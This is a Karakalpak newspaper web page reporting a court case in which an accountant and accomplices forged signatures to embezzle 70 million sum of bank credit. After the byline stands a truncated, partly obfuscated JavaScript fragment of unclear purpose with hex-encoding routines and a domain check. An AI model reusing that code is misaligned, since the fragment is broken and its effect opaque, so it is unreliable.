Еркин Қарақалпақстан Вести Каракалпакстана 01:24:42, 02.06.2020
Хош келипсиз! | RSS
Сайт мазмуны

Кириў усылы

КРЕДИТТИ «КЕЛИСТИРГЕН» ЕСАПШЫ

Соңғы жыллары исбилерменлик субъектлери ушын салық төлемлеринен, банк кредитлеринен бир қатар жеңилликлер жаратылған. Әлбетте, жаратылған бундай имканиятлардан ақылға уғрас пайдаланған исбилерменлер алынған кредитлер есабынан фирма яки кәрханасын заманагөй технологиялар менен толықтырып, өним ислеп шығарыў көлемин кеңейтиў нәтийжесинде қосымша жумыс орынларын жаратып, өзине де, жәмийетке де пайда келтирмекте. Лекин, бес бармақтың бирдей болмағанындай айырым жуўапкерли лаўазымда ислеўши шахслардың алынған кредит қаржыларын талан-тараж етип атырғанына не дерсең.

1980-жылы Елликқала районында туўылған, «Елликқала чорва озуқа» жуўапкершилиги шекленген жәми­йетинде есапшы болып ислеўши Рузимбетов Шавиддин Исмайлович бурынғы ислеген жеринде «есаптан есабын тапқан» болып шықты. Суд мәжилисинде анықланған жағдайларға көре ол 2012-жылдың март ҳәм 2013-жылдың июнь айына шекем «Амир оқ чашма» фермер хожалығында бас есапшы болып ислеген. Өзиниң жуўапкершилигинен қасттан пайдаланыўды мақсет етип акционерлик-коммерциялық «Қишлоққурилишбанк»тиң Беруний филиалы аманат бөлиминиң қадағалаўшысы Н.Бабаджанов ҳәм «Асадбек Шахнозабану» жеке меншик кәрханасы баслығы Г.Юлдашевлар менен жынайый тил бириктирип, банк филиалынан кредит алып, оны өзлестириў жолы менен талан-тараж етиўди нийет етеди. Солай етип, «Асадбек Шахнозабану» жеке меншик кәрханасы тәрепинен 43 бас қарамал сатып алыў ушын деп усынылған алды-сатты шәртнамасына «Амир оқ чашма» фермер хожалығы баслығы Ш.Фахрутдиновтың қолын қәлбекилестирип қойып, мөрин басып бериў нәтийжесинде банктен жеке меншик кәрханаға қарамал алыў ушын ажыратылған 100 миллион сумлық кредит қаржыларының 70 миллион сумын «Амир оқ чашма» фермер хожалығының есап бетине өткериўге ериседи. Өткерилген бул қаржының 23503800 сумын «Беруний ёғгар» акционерлик жәми­йети ҳәм 36.000000 сумын «Елликқала чорва озуқа бирлеспеси» жуўапкершилиги шекленген жәмийети есап бетине өткерип жибереди. Жәми 59503800 сумлық жем-шрот өнимлерин есап-фактура менен алып, буларға да Ш.Фахрутдиновтың қолын тәкирар рәўиште қәлбекилестирип қойып, алынған өнимлерди фермер хожалығының есабына кирис қылмастан Өзбекистан Республикасы Министрлер Кабинетиниң 2002-жыл 26-ноябрьдеги 407-санлы қарар талапларын турпайы түрде бузыўға жол қойып, бир қатар пуқараларға сатып жиберген. Қалған 10 миллион сум қаржының 4.700 мың сумын Ш.Фахрутдиновтың, 1.200 мың сумын Н.Шеримбетованың ҳәм 4.100 мың сумын өзиниң атына ашылған пластик карталарға өткерип, Н.Бабажанов ҳәм Г.Юлдашеваларға бул кредит қаржыларынан 43080 мың сумын нақлай берип жиберип, 26920 мың сумын өз мәплерине ислетип, жәми 70.000000 сумлық жүдә көп муғдардағы өзгениң мүлкин өзлестириў ҳәм растрата қылыў жолы менен талан-тараж еткен.

«Айналайын сәллем сеннен, ҳешким гүман етпес меннен» деп жеке мәпин гөзлеп, нызамға қайшы ҳәрекет еткен Ш.Рузимбетовқа суд уйы­мы тәрепинен қылмысына жараса жаза тайынланды.

Б.ҚУРБАНОВ.

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "erkinkarakalpak.uz"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

 

Излеў

Көп оқылған мақалалар

Сыбайлас сайтлар

Қарақалпақстан Республикасы Жоқарғы Кеңеси ҳәм Министрлер Кеңесиниң газеталары.
Қарақалпақстан баспасөз ҳәм хабар агентлигинде 2007-жыл 7-февральда дизимге алынған. Гүўалық № 01-001
Developed by TUIT NF